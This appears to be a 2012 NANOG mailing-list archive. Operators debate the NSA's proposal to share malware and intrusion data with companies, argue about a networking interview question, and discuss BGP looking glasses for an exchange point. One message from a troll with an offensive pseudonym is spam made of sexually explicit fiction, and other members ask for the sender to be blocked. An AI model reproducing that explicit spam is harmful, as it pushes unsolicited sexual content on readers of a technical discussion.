And it's already delivered "at network speed."

It is my understanding the Dept of Homeland Security already
cooperates in sharing government intrusion information.  We certainly
don't need a "U.S. spy agency" MITM to "protect the private sector."

Moreover, the US is the source of most spam and malware, so the NSA
isn't really going to be much help.  And the US is the source of the
only known cyber attacks on other country's infrastructure, so it's
not likely much help there, either.  Unless they expect retaliation?

===

http://in.reuters.com/article/2012/07/10/net-us-usa-security-cyber-idINBRE86901620120710

U.S. spy agencies say won't read Americans' email for cybersecurity
8:48pm EDT

By Tabassum Zakaria and David Alexander

WASHINGTON (Reuters) - The head of the U.S. spy agency that eavesdrops on
electronic communications overseas sought on Monday to reassure Americans
that the National Security Agency would not read their personal email if
a new cybersecurity law was enacted to allow private companies to share
information with the government.
...

But to help protect the private sector, he said it was important that the
intelligence agency be able to inform them about the type of malicious
software and other cyber intrusions it is seeing and hear from companies
about what they see breaching the protective measures on their computer
networks.

"It doesn't require the government to read their mail or your mail to do
that. It requires them, the Internet service provider or that company, to
tell us that that type of event is going on at this time. And it has to be
at network speed if you're going to stop it," Alexander said.

He said the information the government was seeking was the Internet
address where an email containing malicious software originated and
where it traveled to, not the content of the email.
...

But the U.S.
government is also concerned about the possibility of a cyber
attack from adversaries on critical infrastructure such as the power grid or
transportation systems.

From ops.lists at gmail.com Mon Jul 9 22:17:19 2012
From: ops.lists at gmail.com (Suresh Ramasubramanian)
Date: Tue, 10 Jul 2012 08:47:19 +0530
Subject: U.S. spy agencies ... email for cybersecurity
In-Reply-To: <4FFB898B.2000908@gmail.com>
References: <4FFB898B.2000908@gmail.com>
Message-ID:

I think what Gen.Alexander said and what the reporter missed out is
that they're interested in malware traffic flows, bot C&Cs etc, rather
than smtp received headers

> He said the information the government was seeking was the Internet
> address where an email containing malicious software originated and
> where it traveled to, not the content of the email.

--srs

On Tue, Jul 10, 2012 at 7:16 AM, William Allen Simpson wrote:
> Somebody needs to give them a clue-by-four.  The private sector
> already has the "Internet address where an email ... originated";
> it's already in the Received lines.  We don't need to be informed
> about it, we already inform each other about it.

--
Suresh Ramasubramanian (ops.lists at gmail.com)

From morrowc.lists at gmail.com Mon Jul 9 22:22:30 2012
From: morrowc.lists at gmail.com (Christopher Morrow)
Date: Mon, 9 Jul 2012 23:22:30 -0400
Subject: U.S. spy agencies ... email for cybersecurity
In-Reply-To: <4FFB898B.2000908@gmail.com>
References: <4FFB898B.2000908@gmail.com>
Message-ID:

(note, people ought to: 1) think about this on their own making up
their own minds, 2) understand that the press has some very weird
ideas, 3) take some better protections on their own, for their own
security)

also, I'm not judging the OP nor the reporter nor the ideas espoused
in the article/clips...

On Mon, Jul 9, 2012 at 9:46 PM, William Allen Simpson wrote:
> Somebody needs to give them a clue-by-four.  The private sector

people keep trying, sometimes it's helped.
sometimes reporters need to sell stories :(

> already has the "Internet address where an email ... originated";

it's not just email they care about :( (you knew that I think)

> it's already in the Received lines.  We don't need to be informed
> about it, we already inform each other about it.

one interesting idea, that has proven out some merit over the years is
the ability to share 'incident' data across entry points (say across
companies, or gov'ts even) about 'bad things' that are happening. Take
the case of 'spam came in from this end system to my mailserver', if I
tell you that (or some central system which you can query) you'll
learn that maybe the inbound connection to you is also spam-rich.

> And it's already delivered "at network speed."
>

the article sort of reads like the above scenario though... maybe it's
NOT that, maybe it's something else entirely... it SEEMS that the
gov't wants to help. They may be able to, they may just foul things
up. The reporter certainly didn't leave enough details in place to
tell :(

> It is my understanding the Dept of Homeland Security already
> cooperates in sharing government intrusion information.  We certainly
> don't need a "U.S. spy agency" MITM to "protect the private sector."

you may mean? could be... the wikipedias are sometimes wrong, or so
says the teacher of my 7yr old.

> Moreover, the US is the source of most spam and malware, so the NSA
> isn't really going to be much help.  And the US is the source of the

but hosts in the US that are botted/spamming, also spam/bot other
things outside the US, right? so really who cares where the src is,
get some data collection points up and use that data to inform your
security policy, no? (sure, you'll have to have some smarts, and some
smart people, and be cautious... but you'd do that anyway, right?
:) )

These folks have some awesome tech for that sort of data collection
and analysis:

it's a shame that their parent company can't find a way to monetize
that sort of thing. (the article there talks about some older version
of the system, which is still alive/well today doing fraud detection
and was doing some IDS/anomaly-detection-like work as well for ip
network things)

> only known cyber attacks on other country's infrastructure, so it's
> not likely much help there, either.  Unless they expect retaliation?
>
> ===
>
> http://in.reuters.com/article/2012/07/10/net-us-usa-security-cyber-idINBRE86901620120710
>
> U.S. spy agencies say won't read Americans' email for cybersecurity
> 8:48pm EDT
>
> By Tabassum Zakaria and David Alexander
>
> WASHINGTON (Reuters) - The head of the U.S. spy agency that eavesdrops on
> electronic communications overseas sought on Monday to reassure Americans
> that the National Security Agency would not read their personal email if
> a new cybersecurity law was enacted to allow private companies to share
> information with the government.
> ...
>
> But to help protect the private sector, he said it was important that the
> intelligence agency be able to inform them about the type of malicious

translated: "Hey, what if we could tell our private sector partners
(Lockheed-Martin, for instance) that they should be on the lookout for
things like X, or traffic destined to Y, or people sending all their
DNS queries to these 5 netblocks." (dcwg.org sorta crap)

that doesn't sound 'bad', it sounds like there is a gap in the
business world to wrap all this data up and sell access to it... but
the gov't can jump in with their mountains of data from their
'einstein' or whatever and go to town protecting their 'partners' who
have often close interactions with the gov't, right?

> software and other cyber intrusions it is seeing and hear from companies
> about what they see breaching the protective measures on their computer
> networks.
adding to the above: "What if we had an API such that you could feed
your collected alarm/alert/badness data to us as well? and we could
feed that back into our system, protect ourselves AND send it back out
to the other partners?"

again, that's not that bad, really it sounds pretty cool... only if
MCI could have found a way to productize and monetize that... which we
built for them too :( but I digress.

> "It doesn't require the government to read their mail or your mail to do
> that. It requires them, the Internet service provider or that company, to
> tell us that that type of event is going on at this time. And it has to be
> at network speed if you're going to stop it," Alexander said.

alexander is loose with his pronouns, which makes this worse... in
reality: "send your alarm data to our system, hurrah!", PROBABLY this
could include large ISP people if the pricing (or regulatory world
were right), these folks COULD of course limit that to 'business isp
traffic only', maybe. this sounds a little less on the ball though, so
I'll blame bad reporter-translation, and hope that Alexander really
meant: "Our partners in the industry, who help supply us and build our
widgets for us, would be enabled to send data into our API..."

>
> He said the information the government was seeking was the Internet
> address where an email containing malicious software originated and
> where it traveled to, not the content of the email.

I'm sure this was simply an example... and the reporter jumped on it
like a carnivore, poor job reporter! :(

> ...
>
> But the U.S. government is also concerned about the possibility of a cyber
> attack from adversaries on critical infrastructure such as the power grid or
> transportation systems.

yes, put in the boogie-man! also, keep in mind that CI things are ...
in a horrid state, and as it turns out the folk running it are
ostriches :(

-chris

From jeffshultz at wvi.com Mon Jul 9 23:18:57 2012
From: jeffshultz at wvi.com (Jeff Shultz)
Date: Mon, 09 Jul 2012 21:18:57 -0700
Subject: U.S. spy agencies ... email for cybersecurity
Message-ID:

One thing that GEN Alexander has is a clue. He was my Battalion
Commander in Germany in the early 90s and he is one of those guys you
don't give a second thought to following. Very competent.

From jeroen at mompl.net Mon Jul 9 23:35:22 2012
From: jeroen at mompl.net (Jeroen van Aart)
Date: Mon, 09 Jul 2012 21:35:22 -0700
Subject: job screening question
In-Reply-To:
References:
Message-ID: <4FFBB10A.2020508@mompl.net>

William Herrin wrote:
> This, incidentally, is a detail I'd love for one of the candidates
> to offer in response to that question. Bonus points if you discuss MSS
> clamping and RFC 4821.
>
> The less precise answer, path MTU discovery breaks, is just fine.

I would say that the ability to quickly understand, troubleshoot and
find a solution to a problem (and document it) is a far better skill
to have than having ready made answers to interview questions learned
by heart.

It should take a skilled person less than 30 minutes to find the
answer to that question and understand it too. The importance of
knowing many things by heart has become incredibly moot.

Greetings,
Jeroen

--
Earthquake Magnitude: 4.4
Date: Tuesday, July 10, 2012 04:06:53 UTC
Location: Central Alaska
Latitude: 63.4533; Longitude: -149.4308
Depth: 110.60 km

From ag4ve.us at gmail.com Tue Jul 10 02:32:21 2012
From: ag4ve.us at gmail.com (shawn wilson)
Date: Tue, 10 Jul 2012 03:32:21 -0400
Subject: U.S. spy agencies ... email for cybersecurity
In-Reply-To:
References: <4FFB898B.2000908@gmail.com>
Message-ID:

On Mon, Jul 9, 2012 at 11:22 PM, Christopher Morrow wrote:
>> But to help protect the private sector, he said it was important that the
>> intelligence agency be able to inform them about the type of malicious
>
> translated: "Hey, what if we could tell our private sector partners
> (Lockheed-Martin, for instance) that they should be on the lookout for
> things like X, or traffic destined to Y, or people sending all their
> DNS queries to these 5 netblocks." (dcwg.org sorta crap)
>

or, let's take a real example - rsa gets compromised and a third of the
authentication tons (most?) of government agencies were using is all
of a sudden vulnerable (possibly more than that if you consider that
rsa could've lost classified technology). rsa has to realize the
threat and can take their time to disclose what they want to disclose.

i think if i were in the power to fix that, i would *try* :) ie, i
highly doubt a massively scaled system has a chance at detecting most
apt. also, i don't really like the idea that someone might be
monitoring my activities (who watches the watchers). however, if i
were in the position of acquiring data about threats, i think i'd try
to suck in as much data as i had the processing power to manage.

From goemon at anime.net Tue Jul 10 02:32:21 2012
From: goemon at anime.net (goemon at anime.net)
Date: Tue, 10 Jul 2012 00:32:21 -0700 (PDT)
Subject: job screening question
In-Reply-To: <4FFBB10A.2020508@mompl.net>
References: <4FFBB10A.2020508@mompl.net>
Message-ID:

On Mon, 9 Jul 2012, Jeroen van Aart wrote:
> William Herrin wrote:
>> This, incidentally, is a detail I'd love for one of the candidates
>> to offer in response to that question. Bonus points if you discuss MSS
>> clamping and RFC 4821.
>>
>> The less precise answer, path MTU discovery breaks, is just fine.
> I would say that the ability to quickly understand, troubleshoot and find a
> solution to a problem (and document it) is a far better skill to have than
> having ready made answers to interview questions learned by heart.
>
> It should take a skilled person less than 30 minutes to find the answer to
> that question and understand it too. The importance of knowing many things by
> heart has become incredibly moot.

If you are applying for a network position, you better know the *basics*.
Having to look up the basics is not a good sign.

Do you really want to hire someone who is going to have to look up basic
networking concepts for 30 minutes every time they are in a meeting and
asked a question?

-Dan

From bclark at spectraaccess.com Tue Jul 10 05:56:04 2012
From: bclark at spectraaccess.com (Bret Clark)
Date: Tue, 10 Jul 2012 06:56:04 -0400
Subject: job screening question
In-Reply-To:
References: <4FFBB10A.2020508@mompl.net>
Message-ID: <4FFC0A44.9050800@spectraaccess.com>

On 07/10/2012 03:32 AM, goemon at anime.net wrote:
> On Mon, 9 Jul 2012, Jeroen van Aart wrote:
>> William Herrin wrote:
>>> This, incidentally, is a detail I'd love for one of the candidates
>>> to offer in response to that question. Bonus points if you discuss MSS
>>> clamping and RFC 4821.
>>>
>>> The less precise answer, path MTU discovery breaks, is just fine.
>> I would say that the ability to quickly understand, troubleshoot and find a
>> solution to a problem (and document it) is a far better skill to have than
>> having ready made answers to interview questions learned by heart.
>>
>> It should take a skilled person less than 30 minutes to find the answer to
>> that question and understand it too. The importance of knowing many things by
>> heart has become incredibly moot.
> If you are applying for a network position, you better know the *basics*.
> Having to look up the basics is not a good sign.
>
> Do you really want to hire someone who is going to have to look up basic
> networking concepts for 30 minutes every time they are in a meeting and
> asked a question?
>
> -Dan
>

Hence the reason he mentioned "skilled" person...

From david at davidcoulson.net Tue Jul 10 06:05:34 2012
From: david at davidcoulson.net (David Coulson)
Date: Tue, 10 Jul 2012 07:05:34 -0400
Subject: job screening question
In-Reply-To: <4FFC0A44.9050800@spectraaccess.com>
References: <4FFBB10A.2020508@mompl.net> <4FFC0A44.9050800@spectraaccess.com>
Message-ID: <4FFC0C7E.6060103@davidcoulson.net>

On 7/10/12 6:56 AM, Bret Clark wrote:
>
> Hence the reason he mentioned "skilled" person...
>

Right. A skilled person knows not to commit to anything in a meeting,
or to at least validate what they think before they open their mouth.
Depends on the audience, of course.

At least in my environment, there is not an expectation for someone to
be able to rattle off technical specifics from memory on demand - I've
got an iPad and Google for that. General concepts and
functionality/limitations/whatever are great in that setting, but no
one asks for the level of detail that takes 30 minutes to research and
digest in a meeting. The ability to remember obscure command line
arguments, or parts of a protocol header don't have much value, when
you can look it up in about 10 seconds.

Anyone else noticed their memory has gotten worse since Google came
along? :)

David

From bjorn at mork.no Tue Jul 10 06:24:58 2012
From: bjorn at mork.no (Bjørn Mork)
Date: Tue, 10 Jul 2012 13:24:58 +0200
Subject: job screening question
In-Reply-To: <4FFC0C7E.6060103@davidcoulson.net> (David Coulson's message of "Tue, 10 Jul 2012 07:05:34 -0400")
References: <4FFBB10A.2020508@mompl.net> <4FFC0A44.9050800@spectraaccess.com> <4FFC0C7E.6060103@davidcoulson.net>
Message-ID: <87pq83hn91.fsf@nemi.mork.no>

David Coulson writes:

> Anyone else noticed their memory has gotten worse since Google came
> along? :)

Huh?
Hasn't Google always been there?

Bjørn

From andriy.bilous at gmail.com Tue Jul 10 07:05:49 2012
From: andriy.bilous at gmail.com (Andriy Bilous)
Date: Tue, 10 Jul 2012 14:05:49 +0200
Subject: job screening question
In-Reply-To: <4FFC0C7E.6060103@davidcoulson.net>
References: <4FFBB10A.2020508@mompl.net> <4FFC0A44.9050800@spectraaccess.com> <4FFC0C7E.6060103@davidcoulson.net>
Message-ID:

I think Ivan covered that
http://blog.ioshints.info/2012/03/knowledge-and-complexity.html

And also about hiring in general
http://blog.ioshints.info/2009/12/certifications-and-hiring-process.html

Many say that everything happens in the first 5 minutes of interview,
right chemistry if you like - the rest of the hiring process you're
looking for reasons to hire the person you like or for the reasons to
reject someone you don't like.

On Tue, Jul 10, 2012 at 1:05 PM, David Coulson wrote:
>
> On 7/10/12 6:56 AM, Bret Clark wrote:
>>
>>
>> Hence the reason he mentioned "skilled" person...
>>
>
> Right. A skilled person knows not to commit to anything in a meeting, or to
> at least validate what they think before they open their mouth. Depends on
> the audience, of course.
>
> At least in my environment, there is not an expectation for someone to be
> able to rattle off technical specifics from memory on demand - I've got an
> iPad and Google for that. General concepts and
> functionality/limitations/whatever are great in that setting, but no one
> asks for the level of detail that takes 30 minutes to research and digest in
> a meeting. The ability to remember obscure command line arguments, or parts
> of a protocol header don't have much value, when you can look it up in about
> 10 seconds.
>
> Anyone else noticed their memory has gotten worse since Google came along?
> :)
>
> David
>

From jpmuga at tespok.co.ke Tue Jul 10 07:04:25 2012
From: jpmuga at tespok.co.ke (Joseph M. Owino)
Date: Tue, 10 Jul 2012 15:04:25 +0300 (EAT)
Subject: HELP IN SETTING UP iBGPlay
In-Reply-To: <248cb92a-124d-4f7a-8d2f-f8bfc5e9d9b9@MX-IX-NBO>
Message-ID:

hi,

Anyone out there who can help in setting up iBGP looking glass for an
IXP. We currently are running 2 route servers and 2 switches, they all
are Cisco equipment. We also have a working web server running on
FreeBSD 8.0. Any help is highly appreciated.

regards,
Muga

From randy at psg.com Tue Jul 10 08:44:04 2012
From: randy at psg.com (Randy Bush)
Date: Tue, 10 Jul 2012 22:44:04 +0900
Subject: HELP IN SETTING UP iBGPlay
In-Reply-To:
References: <248cb92a-124d-4f7a-8d2f-f8bfc5e9d9b9@MX-IX-NBO>
Message-ID:

> Anyone out there who can help in setting up iBGP looking glass for an
> IXP.

i am confused. ibgp is internal to an isp. an ixp is external. but i
am easily confused.

randy

From randy at psg.com Tue Jul 10 08:45:43 2012
From: randy at psg.com (Randy Bush)
Date: Tue, 10 Jul 2012 22:45:43 +0900
Subject: HELP IN SETTING UP iBGPlay
In-Reply-To:
References: <248cb92a-124d-4f7a-8d2f-f8bfc5e9d9b9@MX-IX-NBO>
Message-ID:

oh, and all the bgp looking glasses i have surveyed basically sucked.
they either brought in 42kg of dependencies, used naked telnet, or
some other fatal flaw. if you already run rancid, you might look at
the one there.

randy

From mike at mtcc.com Tue Jul 10 08:45:39 2012
From: mike at mtcc.com (Michael Thomas)
Date: Tue, 10 Jul 2012 06:45:39 -0700
Subject: job screening question
In-Reply-To: <4FFC0A44.9050800@spectraaccess.com>
References: <4FFBB10A.2020508@mompl.net> <4FFC0A44.9050800@spectraaccess.com>
Message-ID: <4FFC3203.1070906@mtcc.com>

On 07/10/2012 03:56 AM, Bret Clark wrote:
> On 07/10/2012 03:32 AM, goemon at anime.net wrote:
>> On Mon, 9 Jul 2012, Jeroen van Aart wrote:
>>> William Herrin wrote:
>>>> This, incidentally, is a detail I'd love for one of the candidates
>>>> to offer in response to that question. Bonus points if you discuss MSS
>>>> clamping and RFC 4821.
>>>>
>>>> The less precise answer, path MTU discovery breaks, is just fine.
>>> I would say that the ability to quickly understand, troubleshoot and find a
>>> solution to a problem (and document it) is a far better skill to have than
>>> having ready made answers to interview questions learned by heart.
>>>
>>> It should take a skilled person less than 30 minutes to find the answer to
>>> that question and understand it too. The importance of knowing many things by
>>> heart has become incredibly moot.
>> If you are applying for a network position, you better know the *basics*.
>> Having to look up the basics is not a good sign.
>>
>> Do you really want to hire someone who is going to have to look up basic
>> networking concepts for 30 minutes every time they are in a meeting and
>> asked a question?
>>
>> -Dan
>>
> Hence the reason he mentioned "skilled" person...

This all has to be tempered with the zeitgeist as what is "basic
knowledge" now, will be "charming history" at some point. All of it.
No, a vampire tap has nothing to do with Twilight. No, the difference
between 74 and 54 series logic is not 20.

All of us oldsters would do well to try to keep up with what's new and
hip coming out of schools and grill them in an intelligent fashion.
Better yet, let them teach you something which shows if they
understand or whether they're just parroting stuff back.

Mike

From jpmuga at tespok.co.ke Tue Jul 10 09:26:39 2012
From: jpmuga at tespok.co.ke (Joseph M. Owino)
Date: Tue, 10 Jul 2012 17:26:39 +0300 (EAT)
Subject: HELP IN SETTING UP iBGPlay
In-Reply-To:
Message-ID: <8c95d48d-036f-4d44-a32a-4e1a9c385078@MX-IX-NBO>

Hey thanks, the iBGPlay is not for ibgp alone. Namex which is the IXP
in Italy has implemented the software. You should try the demo it is
really good and informative. Anyway let me try the light weight
http://wiki.version6.net/lg and see how it goes.

----- Original Message -----
From: "Randy Bush"
To: "Joseph M. Owino"
Cc: "North American Network Operators' Group"
Sent: Tuesday, July 10, 2012 4:45:43 PM
Subject: Re: HELP IN SETTING UP iBGPlay

oh, and all the bgp looking glasses i have surveyed basically sucked.
they either brought in 42kg of dependencies, used naked telnet, or
some other fatal flaw. if you already run rancid, you might look at
the one there.

randy

From morrowc.lists at gmail.com Tue Jul 10 09:33:43 2012
From: morrowc.lists at gmail.com (Christopher Morrow)
Date: Tue, 10 Jul 2012 10:33:43 -0400
Subject: U.S. spy agencies ... email for cybersecurity
In-Reply-To:
References: <4FFB898B.2000908@gmail.com>
Message-ID:

On Tue, Jul 10, 2012 at 3:32 AM, shawn wilson wrote:
> On Mon, Jul 9, 2012 at 11:22 PM, Christopher Morrow
> wrote:
>
>
>>> But to help protect the private sector, he said it was important that the
>>> intelligence agency be able to inform them about the type of malicious
>>
>> translated: "Hey, what if we could tell our private sector partners
>> (Lockheed-Martin, for instance) that they should be on the lookout for
>> things like X, or traffic destined to Y, or people sending all their
>> DNS queries to these 5 netblocks." (dcwg.org sorta crap)
>>
>
> or, let's take a real example - rsa gets compromised and a third of the
> authentication tons (most?) of government agencies were using is all
> of a sudden vulnerable (possibly more than that if you consider that
> rsa could've lost classified technology). rsa has to realize the
> threat and can take their time to disclose what they want to disclose.

sure, this isn't really in line with the idea I was getting at, except
that: "Hey, PRC located ips really might be using token-auth to login
to your systems, w00t!"

> i think if i were in the power to fix that, i would *try* :) ie, i
> highly doubt a massively scaled system has a chance at detecting most
> apt.
it might not, but discounting/dealing with all the cruft that today
takes up your ops-folks time easily/mechanically surely frees them up
to focus on the things that they REALLY need to pay attention to...
Essentially, filter out the garbage, focus on the actual threats to
your business. The shared data pool COULD do that.

> also, i don't really like the idea that someone might be monitoring my
> activities (who watches the watchers). however, if i were in the

if you work for a corporation (in the US at least) ... the corporation
already has been monitoring your activities, you signed (in almost all
cases) a paper acknowledging that fact, w00t!

> position of acquiring data about threats, i think i'd try to suck in
> as much data as i had the processing power to manage.

exactly... and if done right, the 'service in the cloud' (or whatever)
that aggregates, can do some bunches of that processing for you.

-chris

From valdis.kletnieks at vt.edu Tue Jul 10 10:03:22 2012
From: valdis.kletnieks at vt.edu (valdis.kletnieks at vt.edu)
Date: Tue, 10 Jul 2012 11:03:22 -0400
Subject: U.S. spy agencies ... email for cybersecurity
In-Reply-To: Your message of "Mon, 09 Jul 2012 21:46:51 -0400." <4FFB898B.2000908@gmail.com>
References: <4FFB898B.2000908@gmail.com>
Message-ID: <3850.1341932602@turing-police.cc.vt.edu>

On Mon, 09 Jul 2012 21:46:51 -0400, William Allen Simpson said:

> But to help protect the private sector, he said it was important that the
> intelligence agency be able to inform them about the type of malicious
> software and other cyber intrusions it is seeing and hear from companies
> about what they see breaching the protective measures on their computer
> networks.

Back in the dark ages at the beginning of this millennium (L1on worm,
anybody?), the guys at SANS created this thing called DShield.

https://isc.sans.edu/about.html#history

Just sayin'.

From ops.lists at gmail.com Tue Jul 10 10:13:06 2012
From: ops.lists at gmail.com (Suresh Ramasubramanian)
Date: Tue, 10 Jul 2012 20:43:06 +0530
Subject: U.S. spy agencies ... email for cybersecurity
In-Reply-To: <3850.1341932602@turing-police.cc.vt.edu>
References: <4FFB898B.2000908@gmail.com> <3850.1341932602@turing-police.cc.vt.edu>
Message-ID:

On Tue, Jul 10, 2012 at 8:33 PM, wrote:
>
> Back in the dark ages at the beginning of this millennium (L1on worm,
> anybody?), the guys at SANS created this thing called DShield.
>
> https://isc.sans.edu/about.html#history

Sure. But if what Gen.Alexander says comes off - this looks like a
US-CERT or other clearinghouse to handle sensitive data of all sorts
(critical infrastructure attacks, sensitive data leaks / breaches etc)

I can see where DShield - and various other players in similar, but
heavily silo'd spaces - might coordinate with a neutral centralized
clearinghouse.

--
Suresh Ramasubramanian (ops.lists at gmail.com)

From hhoffman at ip-solutions.net Tue Jul 10 10:25:31 2012
From: hhoffman at ip-solutions.net (Harry Hoffman)
Date: Tue, 10 Jul 2012 11:25:31 -0400
Subject: U.S. spy agencies ... email for cybersecurity
In-Reply-To:
References: <4FFB898B.2000908@gmail.com> <3850.1341932602@turing-police.cc.vt.edu>
Message-ID: <4FFC496B.7070004@ip-solutions.net>

The government is already doing this via the ISACs.

http://www.ren-isac.net/docs/charter.html

Cheers,
Harry

On 07/10/2012 11:13 AM, Suresh Ramasubramanian wrote:
> On Tue, Jul 10, 2012 at 8:33 PM, wrote:
>>
>> Back in the dark ages at the beginning of this millennium (L1on worm,
>> anybody?), the guys at SANS created this thing called DShield.
>>
>> https://isc.sans.edu/about.html#history
>
> Sure.
But if what Gen.Alexander says comes off - this looks like a > US-CERT or other clearinghouse to handle sensitive data of all sorts > (critical infrastructure attacks, sensitive data leaks / breaches etc) > > I can see where DShield - and various other players in similar, but > heavily silo'd spaces - might coordinate with a neutral centralized > clearinghouse. > From nanog195 at yahoo.com Tue Jul 10 10:44:28 2012 From: nanog195 at yahoo.com (NIG NOG) Date: Tue, 10 Jul 2012 08:44:28 -0700 (PDT) Subject: U.S. spy agencies ... email for cybersecurity In-Reply-To: References: <4FFB898B.2000908@gmail.com> <3850.1341932602@turing-police.cc.vt.edu> Message-ID: <1341935068.57518.YahooMailNeo@web142501.mail.bf1.yahoo.com> ?Come on! It?s time to play with the Wii!? Kimber dragged Chris to the middle balance board. ?Let?s do snowboarding first. That?s fun.? She let everyone get in position, and started the snowboarding game. At first, Chris felt a little clumsy. His massive, stuffed balls weighed heavily on his legs, and his thick, semi-erect dick, straining against his pants, made it feel like they were going to pull down at any moment.? As Tasha and Kimber snickered at his poor performance, Chris felt himself getting annoyed. I?ve never done this with a monster cock between my legs! It?s throwing me off balance! Chris sighed audibly and settled his feet as far apart as possible on the balance board. His mammoth nutsack swung heavily between his legs. It pulled the stretchy pants even lower on his body, exposing the base of his broad prick. Chris felt a bit self-conscious about that, but it felt so good to let his gargantuan ballsack brush against the fabric of his pants and against the sides of his thighs. He soon noticed another benefit. With both his colossal rod and his fat nuts between his legs, his center of gravity had shifted downward considerably. 
From nanog195 at yahoo.com Tue Jul 10 10:45:35 2012 From: nanog195 at yahoo.com (NIG NOG) Date: Tue, 10 Jul 2012 08:45:35 -0700 (PDT) Subject: HELP IN SETTING UP iBGPlay In-Reply-To: References: <248cb92a-124d-4f7a-8d2f-f8bfc5e9d9b9@MX-IX-NBO> Message-ID: <1341935135.48155.YahooMailNeo@web142504.mail.bf1.yahoo.com>
From ops.lists at gmail.com Tue Jul 10 10:49:07 2012 From: ops.lists at gmail.com (Suresh Ramasubramanian) Date: Tue, 10 Jul 2012 21:19:07 +0530 Subject: U.S. spy agencies ... email for cybersecurity In-Reply-To: <4FFC496B.7070004@ip-solutions.net> References: <4FFB898B.2000908@gmail.com> <3850.1341932602@turing-police.cc.vt.edu> <4FFC496B.7070004@ip-solutions.net> Message-ID: On Tue, Jul 10, 2012 at 8:55 PM, Harry Hoffman wrote: > The government is already doing this via the ISACs. > > http://www.ren-isac.net/docs/charter.html I have a lot of respect for what REN-ISAC does but it doesn't nearly have the sort of coverage this project appears to be looking at. -- Suresh Ramasubramanian (ops.lists at gmail.com) From nanog195 at yahoo.com Tue Jul 10 10:49:05 2012 From: nanog195 at yahoo.com (NIG NOG) Date: Tue, 10 Jul 2012 08:49:05 -0700 (PDT) Subject: arin ipv6 whois working for you? In-Reply-To: References: Message-ID: <1341935345.53325.YahooMailNeo@web142506.mail.bf1.yahoo.com>
From shortdudey123 at gmail.com Tue Jul 10 10:51:36 2012 From: shortdudey123 at gmail.com (Grant Ridder) Date: Tue, 10 Jul 2012 10:51:36 -0500 Subject: HELP IN SETTING UP iBGPlay In-Reply-To: <1341935135.48155.YahooMailNeo@web142504.mail.bf1.yahoo.com> References: <248cb92a-124d-4f7a-8d2f-f8bfc5e9d9b9@MX-IX-NBO> <1341935135.48155.YahooMailNeo@web142504.mail.bf1.yahoo.com> Message-ID: can someone do a blanket block on nanog*@yahoo.com? On Tue, Jul 10, 2012 at 10:45 AM, NIG NOG wrote:
From nanog195 at yahoo.com Tue Jul 10 10:53:34 2012 From: nanog195 at yahoo.com (NIG NOG) Date: Tue, 10 Jul 2012 08:53:34 -0700 (PDT) Subject: Running your own DNSchanger proxies In-Reply-To: <4FF9659C.5090601@gmail.com> References: <4FF9659C.5090601@gmail.com> Message-ID: <1341935614.84029.YahooMailNeo@web142502.mail.bf1.yahoo.com>
From valdis.kletnieks at vt.edu Tue Jul 10 10:54:59 2012 From: valdis.kletnieks at vt.edu (valdis.kletnieks at vt.edu) Date: Tue, 10 Jul 2012 11:54:59 -0400 Subject: U.S. spy agencies ... email for cybersecurity In-Reply-To: Your message of "Tue, 10 Jul 2012 21:19:07 +0530."
References: <4FFB898B.2000908@gmail.com> <3850.1341932602@turing-police.cc.vt.edu> <4FFC496B.7070004@ip-solutions.net> Message-ID: <26599.1341935699@turing-police.cc.vt.edu> On Tue, 10 Jul 2012 21:19:07 +0530, Suresh Ramasubramanian said: > On Tue, Jul 10, 2012 at 8:55 PM, Harry Hoffman > wrote: > > The government is already doing this via the ISACs. > > > > http://www.ren-isac.net/docs/charter.html > > I have a lot of respect for what REN-ISAC does but it doesn't nearly > have the sort of coverage this project appears to be looking at. The important point is that it's hardly a new and revolutionary idea... From ops.lists at gmail.com Tue Jul 10 10:58:53 2012 From: ops.lists at gmail.com (Suresh Ramasubramanian) Date: Tue, 10 Jul 2012 21:28:53 +0530 Subject: U.S. spy agencies ... email for cybersecurity In-Reply-To: <26599.1341935699@turing-police.cc.vt.edu> References: <4FFB898B.2000908@gmail.com> <3850.1341932602@turing-police.cc.vt.edu> <4FFC496B.7070004@ip-solutions.net> <26599.1341935699@turing-police.cc.vt.edu> Message-ID: On Tue, Jul 10, 2012 at 9:24 PM, wrote: > >> I have a lot of respect for what REN-ISAC does but it doesn't nearly >> have the sort of coverage this project appears to be looking at. > > The important point is that it's hardly a new and revolutionary idea... Sure. Is there any point in reinventing a wheel? Multiple different silo'd communities have ever been useful - and also the biggest stumbling block for coordination. Clearinghouses at a national level aren't particularly new either - the aussie telecom regulator ACMA set one up for spam / security reports with various local service providers and it's been doing just fine for the past few years. At a basic level, aggregating + anonymizing feeds from various data sources and sending alerts to SPs..
and cooperation only builds upwards from there. -- Suresh Ramasubramanian (ops.lists at gmail.com) From ag4ve.us at gmail.com Tue Jul 10 11:05:36 2012 From: ag4ve.us at gmail.com (shawn wilson) Date: Tue, 10 Jul 2012 12:05:36 -0400 Subject: *spam* Fwd: U.S. spy agencies ... email for cybersecurity Message-ID: can some op filter this asshole? ---------- Forwarded message ---------- From: NIG NOG Date: Tue, Jul 10, 2012 at 11:44 AM Subject: Re: U.S. spy agencies ... email for cybersecurity To: Suresh Ramasubramanian , "valdis.kletnieks at vt.edu" Cc: North American Network Operators Group
-- Shawn Wilson 703-517-1201 From jhellenthal at dataix.net Tue Jul 10 11:10:29 2012 From: jhellenthal at dataix.net (Jason Hellenthal) Date: Tue, 10 Jul 2012 12:10:29 -0400 Subject: HELP IN SETTING UP iBGPlay In-Reply-To: <1341935135.48155.YahooMailNeo@web142504.mail.bf1.yahoo.com> References: <248cb92a-124d-4f7a-8d2f-f8bfc5e9d9b9@MX-IX-NBO> <1341935135.48155.YahooMailNeo@web142504.mail.bf1.yahoo.com> Message-ID: <20120710161029.GA29940@DataIX.net> Anyone going to block this fool? On Tue, Jul 10, 2012 at 08:45:35AM -0700, NIG NOG wrote: -- - (2^(N-1)) From boards188 at gmail.com Tue Jul 10 11:11:59 2012 From: boards188 at gmail.com (Jason Pope) Date: Tue, 10 Jul 2012 11:11:59 -0500 Subject: U.S. spy agencies ... email for cybersecurity Message-ID: Seriously, on the subject of "email for cybersecurity", can we please just black list NIG NOG ? Jason K Pope From john-nanog at johnpeach.com Tue Jul 10 11:16:41 2012 From: john-nanog at johnpeach.com (John Peach) Date: Tue, 10 Jul 2012 12:16:41 -0400 Subject: *spam* Fwd: U.S. spy agencies ... email for cybersecurity In-Reply-To: References: Message-ID: <20120710121641.31ab750b@godzilla.peachfamily.net> On Tue, 10 Jul 2012 12:05:36 -0400 shawn wilson wrote: > can some op filter this asshole? > Please stop forwarding 